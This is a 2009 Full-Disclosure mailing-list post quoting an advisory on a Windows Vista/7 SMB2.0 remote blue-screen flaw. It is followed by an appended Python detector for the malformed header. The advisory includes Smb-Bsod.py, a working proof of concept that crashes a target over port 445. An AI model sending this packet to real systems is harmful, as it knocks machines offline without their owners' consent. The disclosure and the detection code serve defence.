So Msoft! Why can't they just stop reintroducing bugs?

On Wed, Sep 9, 2009 at 11:04 AM, <[email protected]> wrote:

> How come all I hear about is n3td3v, and I see no one crying out
> loud about this:
> http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&task=show&action=view&id=64&Itemid=15
>
> is fd all 'bout trolls nao?
>
> --
> =============================================
> - Release date: September 7th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: Medium/High
> =============================================
>
> I. VULNERABILITY
> -------------------------
> Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>
> II. BACKGROUND
> -------------------------
> Windows Vista and newer Windows versions come with a new SMB version
> named SMB2.
> See:
> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
> for more details.
>
> III. DESCRIPTION
> -------------------------
> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
> PROTOCOL REQUEST functionality.
> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends
> to a SMB server, and it's used to identify the SMB dialect that will
> be used for further communication.
>
> IV. PROOF OF CONCEPT
> -------------------------
>
> Smb-Bsod.py:
>
> #!/usr/bin/python
> # When SMB2.0 receives a "&" char in the "Process Id High" SMB header
> # field it dies with a PAGE_FAULT_IN_NONPAGED_AREA
>
> from socket import socket
> from time import sleep
>
> host = "IP_ADDR", 445
> buff = (
> "\x00\x00\x00\x90" # Begin SMB header: Session message
> "\xff\x53\x4d\x42" # Server Component: SMB
> "\x72\x00\x00\x00" # Negotiate Protocol
> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
> "\x00\x26"         # Process ID High: --> :) normal value should be "\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
> "\x30\x30\x32\x00"
> )
> s = socket()
> s.connect(host)
> s.send(buff)
> s.close()
>
> V. BUSINESS IMPACT
> -------------------------
> An attacker can remotely crash, without any user interaction, any
> Vista/Windows 7 machine with SMB enabled.
> Windows XP, 2k are NOT affected as they don't have this driver.
>
> VI. SYSTEMS AFFECTED
> -------------------------
> Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
> Win Server 2008 as it uses the same SMB2.0 driver (not tested).
>
> VII. SOLUTION
> -------------------------
> Vendor contacted, but no patch available for the moment.
> Close SMB feature and ports, until a patch is provided.
>
> VIII. REFERENCES
> -------------------------
> http://microsoft.com
>
> IX. CREDITS
> -------------------------
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com
> http://g-laurent.blogspot.com/
>
> X. LEGAL NOTICES
> -------------------------
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-- 
http://www.jewelerslounge.com
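A defender-side check for the malformed header the advisory describes, added here as an example and not code from the advisory or from anyone in this thread: it decodes a captured SMB1 NEGOTIATE PROTOCOL REQUEST (NetBIOS session header, 32-byte SMB header, dialect list) and flags a non-zero Process ID High field, which a normally negotiating client leaves at zero. The two sample captures are constructed with a shortened dialect list; the field layout assumed is the standard SMB1 header.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72


def parse_negotiate(payload):
    """Decode NetBIOS session header, 32-byte SMB1 header and dialect list."""
    if len(payload) < 39:
        raise ValueError("too short for an SMB1 negotiate request")
    if payload[0] != 0 or int.from_bytes(payload[1:4], "big") != len(payload) - 4:
        raise ValueError("NetBIOS session header length mismatch")
    hdr = payload[4:36]
    if hdr[:4] != SMB1_MAGIC:
        raise ValueError("not an SMB1 header")
    # magic, command, status, flags, flags2, pid_high, signature, reserved, tid, pid_low, uid, mid
    fields = struct.unpack("<4sBIBHH8sHHHHH", hdr)
    word_count = payload[36]
    bc_off = 37 + 2 * word_count
    byte_count = struct.unpack("<H", payload[bc_off:bc_off + 2])[0]
    data = payload[bc_off + 2:bc_off + 2 + byte_count]
    if len(data) != byte_count:
        raise ValueError("dialect list truncated")
    # dialect list: repeated (0x02 buffer-format byte, NUL-terminated string)
    dialects = [d[1:].decode("ascii", "replace")
                for d in data.split(b"\x00") if d.startswith(b"\x02")]
    return {"command": fields[1], "pid_high": fields[5], "dialects": dialects}


def check_negotiate(payload):
    """Return (suspicious, reason) for one captured request to TCP/445."""
    info = parse_negotiate(payload)
    if info["command"] != SMB_COM_NEGOTIATE:
        return False, "not a negotiate request"
    if info["pid_high"] != 0:
        # The advisory's PoC puts 0x26 ('&') in this field; a client
        # negotiating normally leaves it zero.
        return True, "non-zero Process ID High (0x%04x)" % info["pid_high"]
    return False, "ok"


# Constructed sample captures (not taken from the advisory): a normal
# negotiate offering NT LM 0.12 and SMB 2.002, and the same request with
# the Process ID High bytes changed the way the advisory describes.
_HEAD = b"\x00\x00\x00\x3a" + SMB1_MAGIC + b"\x72" + b"\x00" * 4 + b"\x18\x53\xc8"
_TAIL = (b"\x00" * 10 + b"\xff\xff\xff\xfe" + b"\x00" * 4   # sig, rsvd, tid, pid, uid, mid
         + b"\x00\x17\x00" + b"\x02NT LM 0.12\x00\x02SMB 2.002\x00")  # wc, bc, dialects
NORMAL_CAPTURE = _HEAD + b"\x00\x00" + _TAIL
MALFORMED_CAPTURE = _HEAD + b"\x00\x26" + _TAIL
```

Run over reassembled TCP payloads to port 445, `check_negotiate` returns `(True, ...)` only for the malformed header; the NetBIOS and byte-count checks reject truncated captures with a `ValueError` rather than a false positive.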
